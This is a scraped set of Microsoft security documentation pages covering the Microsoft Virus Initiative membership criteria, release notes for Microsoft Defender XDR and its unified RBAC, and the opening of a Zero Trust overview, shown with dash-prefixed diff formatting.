--- [Microsoft Defender for Cloud Apps](/enterprise-mobility-security/solutions/ems-cloud-app-security-govt-service-description).-- [Microsoft Defender for Identity](/enterprise-mobility-security/solutions/ems-mdi-govt-service-description).-- [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/gov).
security Virus Initiative Criteria https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/virus-initiative-criteria.md
- Title: Microsoft Virus Initiative-
-description: The Microsoft Virus Initiative (MVI) helps organizations that make antivirus or antimalware products integrate with Windows and share telemetry with Microsoft.
------- m365-security-- tier2- Previously updated : 12/08/2023--
-# Microsoft Virus Initiative
-
-The Microsoft Virus Initiative (MVI) helps organizations improve the security solutions our customers rely on to keep them safe. We provide tools, resources, and knowledge to support better-together experiences with great performance, reliability, and compatibility.
-
-## Become a member
-
-You can request membership if you're a representative of an organization that develops antimalware technology. Not all applicants are accepted into the program.
-To be considered for the MVI program, your organization must meet all the following requirements:
-
-1. Your commercially available security solution must provide real-time protection that detects, prevents, and remediates malicious software.
-2. Your organization is responsible for both developing and distributing updates to end-customers that address compatibility with Windows.
-3. Your organization must be active in the antimalware industry and have a positive reputation, as evidenced by participation in industry conferences, membership in industry organizations, or being reviewed in industry-standard reports such as AV-Comparatives, OPSWAT, or Gartner.
-4. Your organization must sign a non-disclosure agreement (NDA) with Microsoft.
-5. Your organization must sign a program license agreement.
-6. Your organization must be active in the program and meet all program requirements.
-7. Your security solution must meet all program requirements, which requires use of [Azure Code Signing](https://techcommunity.microsoft.com/t5/security-compliance-and-identity/azure-code-signing-democratizing-trust-for-developers-and/ba-p/3604669).
-8. Your security solution must have been certified within the last 12 months through independent testing by at least one of the organizations listed below. Yearly certification must be maintained.
-
-|Test Provider|Lab Test Type|Minimum Level / Score|
-||||
-|[AV-Comparatives](https://www.av-comparatives.org/testmethod/real-world-protection-tests/)|Real-World Protection Test.|Approved rating|
-|[AV-Test](https://www.av-test.org/en/about-the-institute/certification/)|Must pass tests for Windows. Certifications for Mac and Linux aren't accepted.|<ul><li>AV-TEST Certified (home)<li></li>AV-TEST Approved (corporate)</li></ul>|
-|[SKD Labs](http://www.skdlabs.com/)|Certification Requirements Product: Anti-virus or Antimalware.|Score >= 98.5% with On Demand, On Access and Total Detection tests|
-|[VB 100](https://www.virusbulletin.com/testing/vb100/vb100-methodology/vb100-methodology-ver1-1/)|VB100 Certification Test V1.1|VB100 Certification|
-|[West Coast Labs](https://www.westcoastlabs.com/checkmark)|Checkmark Certified|Product validated minimum of grade A|
-|[SE Labs](https://selabs.uk/en/reports/consumers/)|Protection, Small Business, or Enterprise EP Protection Test.|<ul><li>Protection A rating<li></li>Small Business EP A rating<li></li>Enterprise EP Protection A rating</li></ul>|
-
-## Apply now
-
-If your organization meets these criteria and is interested in joining, [apply for membership now](https://forms.office.com/Pages/ResponsePage.aspx?id=v4j5cvGGr0GRqy180BHbRxusDUkejalGp0OAgRTWC7BUQVRYUEVMNlFZUjFaUDY2T1U1UDVVU1NKVi4u). Applications are reviewed monthly.
security Whats New In Microsoft Defender Urbac https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/whats-new-in-microsoft-defender-urbac.md
- Title: What's new in Microsoft Defender XDR Unified role-based access control (RBAC)
-description: See what features are available in the latest release of Microsoft Defender XDR Unified role-based access control (RBAC)
-----
- - m365-security-compliance
- - tier2
- Previously updated : 11/8/2023--
-# What's new in Microsoft Defender XDR Unified role-based access control (RBAC)
-
-This article provides information about new features and important product updates for the latest release of Microsoft Defender XDR Unified role-based access control (RBAC).
-
-## January 2024
-
-Microsoft Defender XDR Unified RBAC is now generally available to GCC High and DoD customers. To learn more about the supported workloads and supported data sources, see [Microsoft Defender XDR Unified role-based access control (RBAC)](manage-rbac.md).
-
-The process of importing roles from individual workloads' RBAC models into Microsoft Defender XDR Unified RBAC has been improved. Admins can now view the permissions and assignment of a role before importing it by clicking the role name at the roles to import selection stage.
-
-## December 2023
-
-### Microsoft Defender XDR Unified RBAC is now generally available
-
-Microsoft Defender XDR Unified RBAC is now generally available. This offering is also available to GCC Moderate customers. To learn more about the supported workloads and supported data sources, see [Microsoft Defender XDR Unified role-based access control (RBAC)](manage-rbac.md).
-
-## October 2023
-
-<a name='exchange-online-permission-management-for-microsoft-defender-for-office-365-is-now-supported-in-microsoft-365-defender-unified-role-based-access-control-rbac-providing-full-integration-of-defender-for-office-365-roles-and-permissions'></a>
-
-### Exchange Online permission management for Microsoft Defender for Office 365 is now supported in Microsoft Defender XDR Unified role-based access control (RBAC) providing full integration of Defender for Office 365 roles and permissions
-
-Microsoft Defender XDR Unified Role-Based Access Control (RBAC) model now supports all security permission management scenarios for Microsoft Defender for Office 365.
-
-In addition to the existing support for scenarios that are controlled by Email & collaboration roles (configured in the Microsoft Defender portal at <https://security.microsoft.com/emailandcollabpermissions>), Microsoft Defender XDR Unified RBAC now also supports the management of protection-related Exchange Online permissions, which could previously only be managed in the Exchange admin center (EAC) at <https://admin.exchange.microsoft.com/#/adminRoles>. To learn more about the Exchange Online permissions that are now supported, see [Exchange Online permissions mapping](compare-rbac-roles.md#exchange-online-permissions-mapping).
-
-## September 2023
-
-<a name='export-roles-for-microsoft-365-defender-unified-role-based-access-control-rbac'></a>
-
-### Export roles for Microsoft Defender XDR Unified role-based access control (RBAC)
-
-Now you can easily export your existing roles in Unified RBAC to a CSV file. The exported file will include details such as the role name, the included permissions, the assigned users or user groups, and assigned data sources. When a role has multiple assignments, each assignment will be listed on a separate row in the CSV file. The CSV also includes a snapshot of the Unified RBAC activation status for each workload available on the tenant. For more information, see [Edit, delete and export roles](./edit-delete-rbac-roles.md#export-roles).
-
-## August 2023
-
-### Detection tuning and Security settings permissions
-
-You can now assign a new granular permission called **Detection tuning (manage)** in Microsoft Defender 365 Unified RBAC. Granting the **Detection Tuning (manage)** permission allows security operations analysts to create and manage Custom Detection, Alerts Tuning, and Threat Indicators of Compromise rules without granting them the full **Security Settings (manage)** permission. </br> </br> You can add the new permissions to a custom role by selecting **Authorization and settings \ Security settings** when creating or updating the role. For more information, see [Create custom roles with Microsoft Defender XDR Unified RBAC](./create-custom-rbac-roles.md).
-
-The **Security settings** permission name has been updated to **Core security settings**. This change has no impact on existing roles and permissions.
-
-<a name='microsoft-defender-vulnerability-management-permissions-are-now-integrated-with-microsoft-365-defender-unified-role-based-access-control-rbac'></a>
-
-### Microsoft Defender Vulnerability Management permissions are now integrated with Microsoft Defender XDR Unified role-based access control (RBAC)
-
-You can now control access and grant granular permissions for Microsoft Defender Vulnerability Management as part of the Microsoft Defender XDR Unified RBAC model. For more information, see [Microsoft Defender 365 Unified role-based access control (RBAC)](../defender/manage-rbac.md). You can add the new permissions to a custom role by selecting them from the **Security posture** permissions group when creating the role. For more information, see [Create custom roles with Microsoft Defender XDR Unified RBAC](./create-custom-rbac-roles.md).
-
-<a name='microsoft-secure-score-permissions-integration-with-microsoft-365-defender-unified-role-based-access-control-rbac-is-now-in-public-preview'></a>
-
-### Microsoft Secure Score permissions integration with Microsoft Defender XDR Unified role-based access control (RBAC) is now in Public Preview
-
-You can control access and grant granular permissions for the Microsoft Secure Score experience as part of the Microsoft Defender XDR Unified RBAC model. For more information, see [Manage permissions with Microsoft Defender XDR Unified role-based access control(RBAC)](./microsoft-secure-score.md#manage-permissions-with-microsoft-365-defender-unified-role-based-access-controlrbac).
-
-<a name='a-new-file-collection-permission-in-microsoft-365-defender-unified-rbac-is-now-in-public-preview'></a>
-
-### A new file collection permission in Microsoft Defender XDR Unified RBAC is now in Public Preview
-
-You can now assign a new granular permission in Microsoft Defender XDR Unified RBAC that allows users to collect or download files for analysis. This permission enables Microsoft Defender for Endpoint users download files directly from the file page and during a live response investigation in the live response console. You can add the new permission to a custom role by selecting it from the **Security operations** permissions group when creating the role. For more information, see [Create custom roles with Microsoft Defender XDR Unified RBAC](./create-custom-rbac-roles.md).
-
-For more information on what's new with other Microsoft Defender security products, see:
--- [What's new in Microsoft Defender Vulnerability Management](../defender-vulnerability-management/whats-new-in-microsoft-defender-vulnerability-management.md)-- [What's new in Microsoft Defender for Endpoint](../defender-endpoint/whats-new-in-microsoft-defender-endpoint.md)-- [What's new in Microsoft Defender XDR](../defender/whats-new.md)-- [What's new in Microsoft Defender for Office 365](../office-365-security/defender-for-office-365-whats-new.md)-- [What's new in Microsoft Defender for Identity](/defender-for-identity/whats-new)-- [What's new in Microsoft Defender for Cloud Apps](/cloud-app-security/release-notes)
security Whats New https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/whats-new.md
- Title: What's new in Microsoft Defender XDR
-description: Lists the new features and functionality in Microsoft Defender XDR
--- Previously updated : 04/03/2024---- M365-security-compliance-- tier1---
-# What's new in Microsoft Defender XDR
-
-Lists the new features and functionality in Microsoft Defender XDR.
-
-For more information on what's new with other Microsoft Defender security products and Microsoft Sentinel, see:
--- [What's new in Microsoft Defender for Office 365](../office-365-security/defender-for-office-365-whats-new.md)-- [What's new in Microsoft Defender for Endpoint](../defender-endpoint/whats-new-in-microsoft-defender-endpoint.md)-- [What's new in Microsoft Defender for Identity](/defender-for-identity/whats-new)-- [What's new in Microsoft Defender for Cloud Apps](/cloud-app-security/release-notes)-- [What's new in Microsoft Sentinel](/azure/sentinel/whats-new)-
-You can also get product updates and important notifications through the [message center](https://admin.microsoft.com/Adminportal/Home#/MessageCenter).
-
-## April 2024
--- (Preview) The **unified security operations platform** in the Microsoft Defender portal is now available. This release brings together the full capabilities of Microsoft Sentinel, Microsoft Defender XDR, and Microsoft Copilot in Microsoft Defender. For more information, see the following resources:-
- - Blog announcement: [Unified security operations platform ready to revolutionize protection and efficiency](https://aka.ms/unified-soc-announcement)
- - [Microsoft Sentinel in the Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2263690)
- - [Connect Microsoft Sentinel to Microsoft Defender XDR](microsoft-sentinel-onboard.md)
- - [Microsoft Security Copilot in Microsoft Defender](security-copilot-in-microsoft-365-defender.md)
--- (GA) **[Microsoft Copilot in Microsoft Defender](security-copilot-in-microsoft-365-defender.md)** is now generally available. Copilot in Defender helps you investigate and respond to incidents faster and more effectively. Copilot provides guided responses, incident summaries and reports, helps you build KQL queries to hunt for threats, provide file and script analyses, and enable you to summarize relevant and actionable threat intelligence.-- Copilot in Defender customers can now export incident data to PDF. Use the exported data to easily share incident data, facilitating discussions with your security teams and other stakeholders. For details, see **[Export incident data to PDF](manage-incidents.md#export-incident-data-to-pdf)**.-- **Notifications in the Microsoft Defender portal** are now available. On the top right-hand side of the Defender portal, select the bell icon to view all your active notifications. Different types of notifications are supported such as success, info, warning, and error. Dismiss individual notifications or dismiss all from the notifications tab.-- The `AzureResourceId` column, which shows the unique identifier of the Azure resource associated with a device, is now available in the [DeviceInfo](advanced-hunting-deviceinfo-table.md) table in advanced hunting. -
-## February 2024
--- (GA) **Dark mode** is now available in the Microsoft Defender portal. In the Defender portal, on the top right-hand side of the homepage, select **Dark mode**. Select **Light mode** to change the color mode back to the default.-- (GA) **Assigning severity to incidents**, **assigning an incident to a group**, and the ***go hunt*** option from the attack story graph are now generally available. Guides to learn how to [assign or change incident severity](manage-incidents.md#assign-or-change-incident-severity) and [assign an incident to a group](manage-incidents.md#assign-an-incident) are in the [Manage incidents](manage-incidents.md) page. Learn how you can use the *go hunt* option by exploring [attack story](investigate-incidents.md#attack-story).--- (Preview) **[Custom detection rules in Microsoft Graph security API](/graph/api/resources/security-api-overview?view=graph-rest-beta&preserve-view=true#custom-detections)** are now available. Create advanced hunting custom detection rules specific to your org to proactively monitor for threats and take action.-
->[!Warning]
-> The 2024-02 platform release causes inconsistent results for device control customers using removable media policies with disk/device-level access only (masks that are less of equal to 7). The enforcement might not work as expected.
-> To mitigate this issue, rolling back to the previous version of the Defender platform is recommended.
-
-## January 2024
--- **Defender Boxed is available for a limited period of time**. Defender Boxed highlights your organization's security successes, improvements, and response actions during 2023. Take a moment to celebrate your organization's improvements in security posture, overall response to detected threats (manual and automatic), blocked emails, and more.-
- - Defender Boxed opens automatically when you go to the **Incidents** page in the Microsoft Defender portal.
- - If you close Defender Boxed and you want to reopen it, in the Microsoft Defender portal, go to **Incidents**, and then select **Your Defender Boxed**.
- - Act quickly! Defender Boxed is available only for a short period of time.
--- Defender Experts for XDR now lets you [receive managed response notifications and updates using Teams](get-started-xdr.md#receive-managed-response-notifications-and-updates-in-microsoft-teams). You can also chat with Defender Experts regarding incidents where managed response is issued.--- (GA) New functionality in the **incident queue's available filters** is now generally available. Prioritize incidents according to your preferred filters by creating filter sets and saving filter queries. Learn more about incident queue filters in [Available filters](incident-queue.md#available-filters).--- (GA) Microsoft Defender for Cloud alerts integration with Microsoft Defender XDR is now generally available. Learn more about the integration in [Microsoft Defender for Cloud in Microsoft Defender XDR](microsoft-365-security-center-defender-cloud.md).--- (GA) **Activity log** is now available within an incident page. Use the activity log to view all audits and comments, and add comments to the log of an incident. For details, see [Activity log](manage-incidents.md#activity-log).--- (Preview) **[Query history](advanced-hunting-query-history.md) in advanced hunting** is now available. You can now rerun or refine queries you have run recently. Up to 30 queries in the past 28 days can be loaded in the query history pane.--- (Preview) Additional features you can use to **[drill down](advanced-hunting-query-results.md#drill-down-from-query-results)** further from your query results in advanced hunting are now available.-
-## December 2023
--- **Microsoft Defender XDR Unified role-based access control (RBAC)** is now generally available. Unified (RBAC) allows administrators to manage user permissions across different security solutions from a single, centralized location. This offering is also available to GCC Moderate customers. To learn more, see [Microsoft Defender XDR Unified role-based access control (RBAC)](manage-rbac.md).--- Microsoft Defender Experts for XDR now lets you [exclude devices](get-started-xdr.md#exclude-devices-from-remediation) from remediation actions taken by our experts and instead get remediation guidance for those entities.--- The Microsoft Defender portal's incident queue has updated filters, search, and added a new function where you can create your own filter sets. For details, see [Available filters](incident-queue.md#available-filters).--- You can now assign incidents to a user group or another user. For details, see [Assign an incident](manage-incidents.md#assign-an-incident).-
-## November 2023
--- Microsoft Defender Experts for Hunting now lets you generate sample Defender Experts Notifications so you can start experiencing the service without having to wait for an actual critical activity to happen in your environment. [Learn more](onboarding-defender-experts-for-hunting.md#generate-sample-defender-experts-notifications)--- (Preview) Microsoft Defender for Cloud alerts are now integrated in Microsoft Defender XDR. Defender for Cloud alerts are automatically correlated to incidents and alerts in the Microsoft Defender portal and cloud resource assets can be viewed in the incidents and alerts queues. Learn more about the [Defender for Cloud integration](microsoft-365-security-center-defender-cloud.md) in Microsoft Defender XDR.--- (Preview) Microsoft Defender XDR now has built in [deception technology](deception-overview.md) to protect your environment from high-impact attacks that use human-operated lateral movement. Learn more about the deception feature and how to [configure the deception feature](configure-deception.md).--- Microsoft Defender Experts for XDR now lets you perform your own [readiness assessment](get-started-xdr.md#prepare-your-environment-for-the-defender-experts-service) when preparing the environment for the Defender Experts for XDR service.-
-## October 2023
--- (Preview) You can now get email notifications for manual or automated actions done in Microsoft Defender XDR. Learn how to configure email notifications for manual or automated response actions performed in the portal. For details, see [Get email notifications for response actions in Microsoft Defender XDR](m365d-response-actions-notifications.md).--- (Preview) [Microsoft Security Copilot in Microsoft Defender XDR](security-copilot-in-microsoft-365-defender.md) is now in preview. Microsoft Defender XDR users can take advantage of Security Copilot capabilities to summarize incidents, analyze scripts and codes, use guided responses to resolve incidents, generate KQL queries, and create incident reports within the portal. Security Copilot is on an invitation-only preview. Learn more about Security Copilot in the [Microsoft Security Copilot Early Access Program Frequently Asked Questions](/security-copilot/faq-security-copilot).-
-## September 2023
--- (Preview) Custom detections using data from Microsoft Defender for Identity and Microsoft Defender for Cloud Apps, specifically the `CloudAppEvents`, `IdentityDirectoryEvents`, `IdentityLogonEvents`, and `IdentityQueryEvents` [tables](custom-detection-rules.md#tables-that-support-continuous-nrt-frequency) can now be run in near real-time [Continuous (NRT)](custom-detection-rules.md) frequency.-
-## August 2023
--- Guides to responding to your first incident for new users are now live. [Understand incidents](respond-first-incident-365-defender.md) and learn to triage and prioritize, [analyze your first incident](respond-first-incident-analyze.md) using tutorials and videos, and [remediate attacks](respond-first-incident-remediate.md) by understanding actions available in the portal.--- (Preview) [Asset rule management - Dynamic rules for devices](./configure-asset-rules.md) is now in public preview. Dynamic rules can help manage device context by assigning tags and device values automatically based on certain criteria.--- (Preview) The [DeviceInfo](advanced-hunting-deviceinfo-table.md) table in advanced hunting now also includes the columns `DeviceManualTags` and `DeviceDynamicTags` in public preview to surface both manually and dynamically assigned tags related to the device you are investigating.--- The **Guided response** feature in Microsoft Defender Experts for XDR has been renamed to **[Managed response](managed-detection-and-response-xdr.md)**. We have also added a [new FAQ section](faq-incident-notifications-xdr.md#understanding-and-managing-defender-experts-for-xdr-incident-updates) on incident updates.-
-## July 2023
--- (GA) The [Attack story](investigate-incidents.md#attack-story) in incidents is now generally available. The attack story provides the full story of the attack and allows incident response teams to view the details and apply remediation.--- A new URL and domain page is now available in Microsoft Defender XDR. The updated URL and domain page provides a single place to view all the information about a URL or a domain, including its reputation, the users who clicked it, the devices that accessed it, and emails where the URL or domain was seen. For details, see [Investigate URLs in Microsoft Defender XDR](../defender-endpoint/investigate-domain.md).-
-## June 2023
--- (GA) Microsoft Defender Experts for XDR is now generally available. Defender Experts for XDR augments your security operations center by combining automation and Microsoft's security analyst expertise, helping you detect and respond to threats with confidence and improve your security posture. Microsoft Defender Experts for XDR is sold separately from other Microsoft Defender XDR products. If you're a Microsoft Defender XDR customer and are interested in purchasing Defender Experts for XDR, see [Overview of Microsoft Defender Experts for XDR](dex-xdr-overview.md).-
-## May 2023
--- (GA) [Alert tuning](investigate-alerts.md#tune-an-alert) is now generally available. Alert tuning lets you fine-tune alerts to reduce investigation time and focus on resolving high priority alerts. Alert tuning replaces the Alert suppression feature.--- (GA) [Automatic attack disruption](automatic-attack-disruption.md) is now generally available. This capability automatically disrupts human-operated ransomware (HumOR), business email compromise (BEC), and adversary-in-the-middle (AiTM) attacks.--- (Preview) [Custom functions](advanced-hunting-custom-functions.md) are now available in advanced hunting. You can now create your own custom functions so you can reuse any query logic when you hunt in your environment.-
-## April 2023
--- (GA) The [unified Assets tab in the Incidents page](investigate-incidents.md) is now generally available.--- Microsoft is using a new weather-based naming taxonomy for threat actors. This new naming schema will provide more clarity and will be easier to reference. [Learn more about the new naming taxonomy](../intelligence/microsoft-threat-actor-naming.md).-
-## March 2023
--- (Preview) Microsoft Defender Threat Intelligence (Defender TI) is now available in the Microsoft Defender portal.-
-This change introduces a new navigation menu within the Microsoft Defender portal named **Threat Intelligence**. [Learn more](defender-threat-intelligence.md)
--- (Preview) Complete device reports for the [`DeviceInfo` table](advanced-hunting-deviceinfo-table.md) in advanced hunting are now sent *every hour* (instead of the previous daily cadence). In addition, complete device reports are also sent whenever there is a change to any previous report. New columns were also added to the `DeviceInfo` table, along with several improvements to existing data in `DeviceInfo` and [DeviceNetworkInfo](advanced-hunting-devicenetworkinfo-table.md) tables.--- (Preview) Near real-time custom detection is now available for public preview in advanced hunting custom detections. There is a new [Continuous (NRT)](custom-detection-rules.md) frequency, which checks data from events as they are collected and processed in near real-time.--- (Preview) [Behaviors in Microsoft Defender for Cloud Apps](/defender-cloud-apps/behaviors) is now available for public preview. Preview customers can now also hunt for behaviors in advanced hunting using the [BehaviorEntities](advanced-hunting-behaviorentities-table.md) and [BehaviorInfo](advanced-hunting-behaviorinfo-table.md) tables.-
-## February 2023
--- (GA) The [query resources report in advanced hunting](advanced-hunting-limits.md#view-query-resources-report-to-find-inefficient-queries) is now generally available.--- (Preview) The [automatic attack disruption](automatic-attack-disruption.md) capability now disrupts business email compromise (BEC).-
-## January 2023
--- The new version of Microsoft Defender Experts for Hunting report is now available. The report's new interface now lets customers have more contextual details about the suspicious activities Defender Experts have observed in their environments. It also shows which suspicious activities have been continuously trending from month to month. For details, see [Understand the Defender Experts for Hunting report in Microsoft Defender XDR](defender-experts-report.md).--- (GA) Live Response is now generally available for macOS and Linux.--- (GA) Identity timeline is now generally available as part of the new Identity page in Microsoft Defender XDR. The updated User page has a new look, an expanded view of related assets and a new dedicated timeline tab. The timeline represents activities and alerts from the last 30 days. It unifies a user's identity entries across all available workloads: Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, and Microsoft Defender for Endpoint. Using the timeline helps you easily focus on a user's activities (or activities performed on them) in specific timeframes.-
-## December 2022
--- (Preview) The new Microsoft Defender XDR role-based access control (RBAC) model is now available for preview. The new RBAC model enables security admins to centrally manage privileges across multiple security solutions within a single system with a greater efficiency, currently supporting Microsoft Defender for Endpoint, Microsoft Defender for Office 365, and Microsoft Defender for Identity. The new model is fully compatible with the existing individual RBAC models currently supported in Microsoft Defender XDR. For more information, see [Microsoft Defender XDR role-based access control (RBAC)](./manage-rbac.md).-
-## November 2022
--- (Preview) Microsoft Defender Experts for XDR (Defender Experts for XDR) is now available for preview. Defender Experts for XDR is a managed detection and response service that helps your security operations centers (SOCs) focus and accurately respond to incidents that matter. It provides extended detection and response for customers who use Microsoft Defender XDR workloads: Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, and Azure Active Directory (Azure AD). For details, refer to [Expanded Microsoft Defender Experts for XDR preview](dex-xdr-overview.md).--- (Preview) The query resource report is now available in advanced hunting. The report shows your organization's consumption of CPU resources for hunting based on queries that ran in the last 30 days using any of the hunting interfaces. See [View query resources report](advanced-hunting-limits.md#view-query-resources-report-to-find-inefficient-queries) to find inefficient queries.-
-## October 2022
--- (Preview) The new automatic attack disruption capability is now in preview. This capability combines security research insights and advances AI models to automatically contain attacks in progress. Automatic attack disruption also provides more time to security operations centers (SOCs) to fully remediate an attack and limits an attack's impact to organizations. This preview automatically disrupts ransomware attacks.-
-## August 2022
--- (GA) [Microsoft Defender Experts for Hunting](defender-experts-for-hunting.md) is now generally available. If you're a Microsoft Defender XDR customer with a robust security operations center but want Microsoft to help you proactively hunt for threats across endpoints, Office 365, cloud applications, and identity using Microsoft Defender data, then learn more about applying, setting up, and using the service. Defender Experts for Hunting is sold separately from other Microsoft Defender XDR products.--- (Preview) [Guided mode](advanced-hunting-modes.md#get-started-with-guided-hunting-mode) is now available for public preview in advanced hunting. Analysts can now start querying their database for endpoint, identities, email & collaboration, and cloud apps data *without knowing Kusto Query Language (KQL)*. Guided mode features a friendly, easy-to-use, building-block style of constructing queries through dropdown menus containing available filters and conditions. See [Get started with query builder](advanced-hunting-query-builder.md).-
-## July 2022
--- (Preview) Microsoft Defender Experts for Hunting public preview participants can now look forward to receiving monthly reports to help them understand the threats the hunting service surfaced in their environment, along with the alerts generated by their Microsoft Defender XDR products. For details, refer to [Understand the Defender Experts for Hunting report in Microsoft Defender XDR](defender-experts-report.md).-
-## June 2022
--- (Preview) The [DeviceTvmInfoGathering](advanced-hunting-devicetvminfogathering-table.md) and [DeviceTvmInfoGatheringKB](advanced-hunting-devicetvminfogatheringkb-table.md) tables are now available in the advanced hunting schema. Use these tables to hunt through assessment events in Defender Vulnerability Management including the status of various configurations and attack surface area states of devices.--- The newly introduced Automated investigation & response card in the Microsoft Defender portal provides an overview on pending remediation actions.-
-The security operations team can view all actions pending approval, and the stipulated time to approve those actions in the card itself. The security team can quickly navigate to the Action center and take appropriate remediation actions. The Automated investigation & response card also has a link to the Full Automation page. This enables the security operations team to effectively manage alerts and complete remediation actions in a timely manner.
-
-## May 2022
--- (Preview) In line with the recently announced expansion into a new service category called [Microsoft Security Experts](https://aka.ms/MicrosoftSecurityExperts), we're introducing the availability of [Microsoft Defender Experts for Hunting](defenderexpertsforhuntingprev.md) (Defender Experts for Hunting) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.-
-## April 2022
--- (Preview) [Actions](advanced-hunting-take-action.md) can now be taken on email messages straight from hunting query results. Emails can be moved to other folders or deleted permanently.--- (Preview) The new [`UrlClickEvents` table](advanced-hunting-urlclickevents-table.md) in advanced hunting can be used to hunt for threats like phishing campaigns and suspicious links based on information coming from Safe Links clicks in email messages, Microsoft Teams, and Office 365 apps.-
-## March 2022
--- (Preview) The incident queue has been enhanced with several features designed to help your investigations. Enhancements include capabilities such as ability to search for incidents by ID or name, specify a custom time range, and others.-
-## December 2021
--- (GA) The `DeviceTvmSoftwareEvidenceBeta` table was added on a short-term basis in advanced hunting to allow you to view evidence of where a specific software was detected on a device.-
-## November 2021
--- (Preview) The application governance add-on feature to Defender for Cloud Apps is now available in Microsoft Defender XDR. App governance provides a security and policy management capability designed for OAuth-enabled apps that access Microsoft 365 data through Microsoft Graph APIs. App governance delivers full visibility, remediation, and governance into how these apps and their users access, use, and share your sensitive data stored in Microsoft 365 through actionable insights and automated policy alerts and actions. [Learn more about application governance](/cloud-app-security/app-governance-manage-app-governance).--- (Preview) The [advanced hunting](advanced-hunting-overview.md) page now has multitab support, smart scrolling, streamlined schema tabs, quick edit options for queries, a query resource usage indicator, and other improvements to make querying smoother and easier to fine-tune.--- (Preview) You can now use the [link to incident](advanced-hunting-link-to-incident.md) feature to include events or records from the advanced hunting query results right into a new or existing incident that you are investigating.-
-## October 2021
--- (GA) In advanced hunting, more columns were added in the [CloudAppEvents](advanced-hunting-cloudappevents-table.md) table. You can now include `AccountType`, `IsExternalUser`, `IsImpersonated`, `IPTags`, `IPCategory`, and `UserAgentTags` to your queries.-
-## September 2021
--- (GA) Microsoft Defender for Office 365 event data is available in the Microsoft Defender XDR event streaming API. You can see the availability and status of event types in the [Supported Microsoft Defender XDR event types in streaming API](supported-event-types.md).--- (GA) Microsoft Defender for Office 365 data available in advanced hunting is now generally available.--- (GA) Assign incidents and alerts to user accounts-
- You can assign an incident, and all the alerts associated with it, to a user account from **Assign to:** on the **Manage incident** pane of an incident or the **Manage alert** pane of an alert.
-
-## August 2021
--- (Preview) Microsoft Defender for Office 365 data available in advanced hunting-
- New columns in email tables can provide more insight into email-based threats for more thorough investigations using advanced hunting. You can now include the `AuthenticationDetails` column in [EmailEvents](./advanced-hunting-emailevents-table.md), `FileSize` in [EmailAttachmentInfo](./advanced-hunting-emailattachmentinfo-table.md), and `ThreatTypes` and `DetectionMethods` in [EmailPostDeliveryEvents](./advanced-hunting-emailpostdeliveryevents-table.md) tables.
--- (Preview) Incident graph-
- A new **Graph** tab on the **Summary** tab of an incident shows the full scope of the attack, how the attack spread through your network over time, where it started, and how far the attacker went.
-
-## July 2021
--- [Professional services catalog](https://sip.security.microsoft.com/interoperability/professional_services)-
- Enhance the detection, investigation, and threat intelligence capabilities of the platform with supported partner connections.
-
-## June 2021
--- (Preview) [View reports per threat tags](threat-analytics.md#view- reports-by-category)-
- Threat tags help you focus on specific threat categories and review the most relevant reports.
--- (Preview) [Streaming API](../defender-endpoint/raw-data-export.md)-
- Microsoft Defender XDR supports streaming all the events available through Advanced Hunting to an Event Hubs and/or Azure storage account.
--- (Preview) [Take action in advanced hunting](advanced-hunting-take-action.md)-
- Quickly contain threats or address compromised assets that you find in [advanced hunting](advanced-hunting-overview.md).
--- (Preview) [In-portal schema reference](advanced-hunting-schema-tables.md#get-schema-information-in-the-security-center)-
- Get information about advanced hunting schema tables directly in the security center. In addition to table and column descriptions, this reference includes supported event types (`ActionType` values) and sample queries.
--- (Preview) [DeviceFromIP() function](advanced-hunting-devicefromip-function.md)-
- Get information about which devices have been assigned a specific IP address or addresses at a given time range.
-
-## May 2021
--- [New alert page in the Microsoft Defender portal](https://techcommunity.microsoft.com/t5/microsoft-365-defender/easily-find-anomalies-in-incidents-and-alerts/ba-p/2339243)-
- Provides enhanced information for the context into an attack. You can see which other triggered alert caused the current alert and all the affected entities and activities involved in the attack, including files, users and mailboxes. See [Investigate alerts](investigate-alerts.md) for more information.
--- [Trend graph for incidents and alerts in the Microsoft Defender portal](https://techcommunity.microsoft.com/t5/microsoft-365-defender/new-alert-page-for-microsoft-365-defender-incident-detections/ba-p/2350425)-
- Determine if there are several alerts for a single incident or that your organization is under attack with several different incidents. See [Prioritize incidents](incident-queue.md) for more information.
-
-## April 2021
--- Microsoft Defender XDR-
- The improved [Microsoft Defender XDR](https://security.microsoft.com) portal is now available. This new experience brings together Defender for Endpoint, Defender for Office 365, Defender for Identity, and more into a single portal. This is the new home to manage your security controls. [Learn what's new](microsoft-365-defender-portal.md).
--- [Microsoft Defender XDR threat analytics report](threat-analytics.md)-
- Threat analytics helps you respond to and minimize the impact of active attacks. You can also learn about attack attempts blocked by Microsoft Defender XDR solutions and take preventive actions that mitigate the risk of further exposure and increase resiliency. As part of the unified security experience, threat analytics is now available for Microsoft Defender for Endpoint and Microsoft Defender for Office E5 license holders.
-
-## March 2021
--- [CloudAppEvents table](advanced-hunting-cloudappevents-table.md)-
- Find information about events in various cloud apps and services covered by Microsoft Defender for Cloud Apps. This table also includes information previously available in the `AppFileEvents` table.
--
security Zero Trust With Microsoft 365 Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/zero-trust-with-microsoft-365-defender.md
- Title: Zero Trust with Microsoft Defender XDR
-description: Microsoft Defender XDR contributes to a strong Zero Trust strategy and architecture
-
- - NOCSH
----
- - m365-security
- - tier1
--
-adobe-target: true
Previously updated : 04/24/2023--
-# Zero Trust with Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-
-Microsoft Defender XDR contributes to a strong Zero Trust strategy and architecture by providing extended detection and response (XDR). Microsoft Defender XDR works together with other Microsoft XDR tools and services and can be integrated with Microsoft Sentinel as a security information and event management (SIEM) source for a complete XDR/SIEM solution.
-
-Microsoft Defender XDR is an XDR solution that automatically collects, correlates, and analyzes signal, threat, and alert data from across your Microsoft 365 environment, including endpoint, email, applications, and identities.
--
